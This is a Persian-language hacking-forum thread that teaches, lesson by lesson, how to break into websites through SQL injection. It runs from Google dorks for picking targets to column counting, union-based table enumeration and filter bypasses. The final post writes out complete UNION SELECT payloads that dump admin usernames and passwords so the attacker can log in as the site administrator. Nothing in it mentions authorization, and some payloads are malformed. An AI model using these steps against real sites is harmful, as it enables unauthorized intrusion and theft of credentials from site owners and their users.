رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

پست های پیشنهاد شده

با سلام و درود 

این تاپیک با هماهنگی مدیریت سایت P0!s0nC0d3  ایجاد شده است و امیدواریم آموزش خوبی را ارائه دهیم

آموزش ها از پایه شروع میشود به مراحل پیشرفته هم خواهد رسید پس دوستان

با اندکی  صبر حوصله ما را خوشحال کنند.

قوانین تاپیک به شرح زیر است :

1-ارسال هرگونه پست اسپم کاملا ممنوع 

2-هرگونه نظرات و انتقادات به صورت پیغام خصوصی ارسال شوند 

3- از دوستان خواهش میشود هرگونه کمک و راهنمایی دارند به من اطلاع دهند تا تاپیک پربار تر شود

4-برای هرگونه تشکر فقط دکمه تشکر را بزنید و پست ندهید

برای شروع یک فایل pdf آماده شده است 

 

(اگر غلط املایی بود یا هرنوع اشتباه دیگری به بزرگی خود ببخشید)

 

 

باتشکر از تمامی دوستان

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


با سلام و درود 

جلسه دوم

بعد از یادگرفتن تعاریف بالا باید از سایتی که میخوایم اطلاعاتی به دست بیاریم

این اطلاعات از قبیل   Domain ID ، نام مدیر سایت ، و .....

 

میتونید برای به دست آوردن اطلاعات از سایت 

This is the hidden content, please

استفاده کنید

 

برای راهنمایی بیشتر فیلم آموزشی رو گذاشتم

رمز فایل : guardiran.org

موفق باشید 

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


سلامی دوباره

جلسه سوم 

آشنایی با دورک ها و پیداکردن تارگت 

دورک چیست : دورک ها یه سری کد هایی هستند که کاربران برای جستجوی سریع تر و دقیق تر و پیدا کردن تارگت های خود در موتورهای جستجو گر از 

آن ها استفاده میکند.

 

برای مثال یک نمونه دورک : 

This is the hidden content, please

اگر ما این کد رو در موتورهای جستجوگری مثل گوگل سرچ کنیم. سایت هایی که محدود کنندشون .org و در url آن

کلمه ی  Food  وجود داشته باشد بدست میاد.

 

شما میتونید هرجور که دوست دارید دورک ها رو تعغیر بدید

This is the hidden content, please

اگر ما کلمه آخر رو سرچ کنیم سایت های که com هستن و در اون ها کلمه  Hacked  وجود داشته باشه میان ...

 

پایان جلسه سوم  

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


درود 

جلسه چهارم پیدا کردن باگ

 

 اولین باگی که در این آموزش شروع میشه باگ مشهوره SQL Injection میباشد که یکی از خطرناک ترین باگ هاست. دقت داشته باشید به دلیل مشهور بودنشن خیلی ها این باگ

رو
پچ کردن ولی خب سایت های زیادی هست که هنوز این باگ رو داره .

 

 

در  باگ SQL دیتابیس های زیادی هست که از مشهورترین و خطرناک ترین  آنها میشه به این ها اشاره کرد :         MySQL , MsSQL , orcal , Acces

 

خب ما دراین آموزش به حمله  MySQL می پردازیم 

برای تست آسیب پذیری میتوان از 2 روش استفده کرد :1. کارکتری 2. علمی

 

ادامه مبحث تو فیلم هست

 

پسورد فایل : guardiran.org

 

موفق باشید

 

 

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


سلامی دوباره 

 

جلسه پنجم 

 

Column های تارگت

خب در این قسمت طبق ترتیب میرسیم به پیدا کردن ستون یا Column  های سایت مورد نظر ....

 

برای این کار از این دستور استفاده میشود   y+order+by+x-- 

 

خب y ما همون عدید که بعد از id تارگت هستش و میتونه هرچی  باشه و نیازی به عوض کردنش نیست .

x متغیر ماست . ما با عدد دادن به x تعداد کالومن های تارگت رو پیدا میکنیم.

ما انقدر به
x عدد میدهیم تا به یک ارور یا یک پیج ناقص برسیم....

 

برای مثلا تارگت مورد نظر ما   

This is the hidden content, please

است 

20 همون y ماست و نیازی به تغیر دادن نیست . خب ما دستور رو به تارگت تزریق میکنیم :

This is the hidden content, please

به x عدد میدیم :  

This is the hidden content, please

فرضا روی عدد 20 ارور گرفتیم پس تعداد کالومن 19 تاست

 

n-1

 

اگر متوجه نشدید فیلم آموزشی هست

 

پسورد فایل : guardiran.org

 

فایل اصلاح شد

موفق و پیروز باشید

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


با سلام

جلسه ششم 

پیدا  تیبل آسیب پذیر

در این بخش طبق ترتیب به آموزش پیدا کردن جدول یا Table های آسیب پذیر دیتابیس میگردیم.

دقت داشته باشید باید تیبله آسیب پذیری  باشد تا بتوانیم ادامه دستورات را تزریق کنیم.

 

برای این از دستور زیر استفده میکنیم 

This is the hidden content, please

حواستون باشه باید به جای Column number تعداد کالمون هایی رو که به دست آوردید بنویسید 

 

برای مثلا اگر تعداد کالومن تارگت 15تا باشه اینجوری میشه :

خود تارگت :

This is the hidden content, please

مرحله تزریق:

This is the hidden content, please

ادامه دستورات درفیلم هستش ...!!

 

 

پسورد فایل : guardiran.org

 

موفق و پیروز باشید

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


با سلام

یعنی باید پشتکار رو از من یاد بگیرید..! از پست  اول تاحالا یه تشکر هم نداشتم ولی هینطور دارم ادامه میدم

This is the hidden content, please
/emoticons/sad@2x.png 2x" width="20" height="20" />

 

خب بریم سرکارمون

This is the hidden content, please
/emoticons/smile@2x.png 2x" width="20" height="20" /> 

 

جلسه هفتم 

پیدا کردن ورژن دیتابیس

در درس های قبل  پیدا کردن سایت آسیب پذیر - تست آسیب پذیری - پیدا کردن تعداد ستون های دیتابیس - پیدا کردن جدول آسیب پذیر رو یاد گرفتید 

 

حالا باید نحوه پیدا کردن ورژن دیتا بیس رو یاد بگیرید ..!

 

ورژن دیتابیس برای ما مهمه . ورژن ها یا 5 یا پاین تر از 5 هستند. نحوه ی  تزریق دستورات

در این دو ورژن متفاوت هست . ما در این قسمت اینجکت ورژن 5 رو یاد میدم.

 

خب برای پیدا کردن ورژن دیتابیس از این  دستورات  استفاده میکنیم : version()         ویا   @@version 

 

بقیه مراحل تو فیلم آموزشی قرار داده شده 

 

پسورد فایل : guardiran.org

 

فایل اصلاح شد

موفق و پیروز باشید

 

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


درود 

 

جلسه ی هشتم 

 

پیدا کردن تیبیل های دیتابیس

خب ما پس از پیدا کردن ورژن دیتابیس باید نام تیبل های دیتابیس رو پیدا کنیم.

 

برای این باید دستور زیر رو به تیبل آسیب پذیر تزریق میکنیم :

This is the hidden content, please

و به آخر تارگت این رو  اضافه میکنیم : 

This is the hidden content, please

 

 با دستور بالا ما نام یکی از تیبل های دیتابیس رو پیدا کردیم ولی ما نیاز به همشون داریم پس از دستور

زیر استفاده میکنیم :

This is the hidden content, please

ادامه توضیحات در فیلم 

پسورد فایل : guardiran.org

 

موفق و پیروز باشید

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


با سلام و درود 

جلسه نهم 

محدود کردن دیتابیس 

در این درس یاد میگیریم که چگونه دیتابیس رو محدود کنیم و تیبل های مهم و پر کاربرد رو بدست بیاوریم....!

 

برای این کار از همان دستور قبل استفاده میکنیم و تنها چیزی که به دستور اضافه میکنیم دستور زیر میباشد :

This is the hidden content, please

توضیحات بیشتر در فیلم 

پسورد فایل : guardiran.org

 

موفق و پیروز باشید

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


  • 2 ماه بعد...

سلامی دوباره 

 

بعد از مدت ها دوباره تاپیک رو ادامه میدم 

 

خب تا اینجا بیشتر مراحل رو یادگرفتید از این به بعد بهتون bypass  دستورات رو یادمیدم 

 

حالا شاید سوال پیش باید bypass یعنی چی ؟ 

 

bypass یعنی مایه دستوری رو به تارگت تزریق میکنیم ولی دستور اجرا نمیشه bypass درواقع همون دور زدن هست 

 

برای مثال : گاهی اوقات هنگام پیدا کردن تعداد ستون های سایت هرچی متغیر رو بالا میبریم به ارور نمیرسیم در اینجا باید از bypass استفاده کنیم 

 

آموزش بایپس  Union Select : 

This is the hidden content, please

آموزش بایپس order+by : 

This is the hidden content, please

آموزش بایپس group_concat(table_name)  : 

This is the hidden content, please
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


  • 1 ماه بعد...

خوب دوستان مرحله اخر از آموزش حملات Sql Injection رو بنده قرار شده کامل کنم چون اون عزیز تشریف ندارند .

 

 

پس تا به اینجا رسیدیم که می تونید دیتابیس رو محدود کنید اما بخاطر اینکه وقفه افتاده بنده از جندین دستور قبلش شروع می کنم .

 

از اول یبار مثالم رو با ذر توضیحات زیر تقدیم حضور می کنم :

 

 

1- اسم تارگت ما  

This is the hidden content, please

 

2- توسط دستور order by پیش رفتیم و شده 5

 

3- کالومن اینجکت پذیر ما هم شده 3

 

4- حالا میخواهیم تیبلهارو بدست بیاریم :

 

www.Target.ie/target.php?id=-20+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+table_schema=database()--

 

5- حالا فرض می کنیم تیبلهارو بدست آوردیم و بر طبق لیست زیر به ما نشون داده :

 

tb_user

tb_admin

tb_gallery

,......

 

خوب دوستان دقت کنید همیشه بنام admin نیست امکان داره بصورت بالا یا به نامهای دیگه باشه و دیگه تشخیصش با خودتونه .

 

حالا چکار می کنیم ؟ باید بریم محتویات این تیبل رو بدست بیاریم بصورت زیر :

 

** خاطرتون باشه در آخر دستورات بالا که بشما نشون دادم نوشته شده   --()database و حالا اینرو باید به Char تبدیل نید و می تونید از طریق افزونه

 

hackbar در فایرفاکس استفده کنید و تبدیل کنید :

 

--CHAR(..,..,..,..,..,..,)www.Target.ie/target.php?id=-20+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+table_name=database

 

6- حالا نوبت میرسه به بیرون کشیدن اطلاعات ادمین و فرض می کنیم بصورت زیر باشه :

 

admin_user

admin_password

admin_id

admin_bithday

,....

 

پس می بینیم اطلاعاتی که ما احتیاج داریم در بخش هایی هست ه بنده با رنگ قرمز نمایش دادم و اگر این اطلاعات رو بدرستی بدست بیاریم می تونیم

 

به جای ادمین لاگین کنیم و....

 

7- دستوراتی که باید وارد کنیم هم بصورت زیر هستند :

 

--www.Target.ie/target.php?id=-20+union+select+1,2,group_concat(admin_user,0x3a,admin_password),4,5+from+ta_admin

 

7- و الان دیگه یوزر و پسورد ادمین رو دارین و می تونید لاگین کنید .

 

 

شاید برای بعضی از دوستان سوال باشه که 0x3a در دستوارت بالا به چه معنی هست ؟ این همین علامت ( : ) هست که من بصورت هگز شده درش آوردم

 

و برای خواناتر شدن هست یعنی اینه اطلاعات رو اگر فرض کنیم که یوزر admin باشه و پسورد هم 12345 باشه توسط دستوارت بالا بصورت زیر نمایش

 

میده :

 

admin : 12345

 

اینهم از بخش آخر آموزش هک سایت با باگ Sql Inection .

 

 

امیدوارم برای شما عزیزان مفید بوده باشه .

 

 

سعی می کنم تصویریش رو هم سریعتر براتون درست کنم تا مشکلی نباشه .

 

 

موفق باشید

 

 

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


مهمان
این موضوع برای عدم ارسال قفل گردیده است.
×
×
  • ایجاد مورد جدید...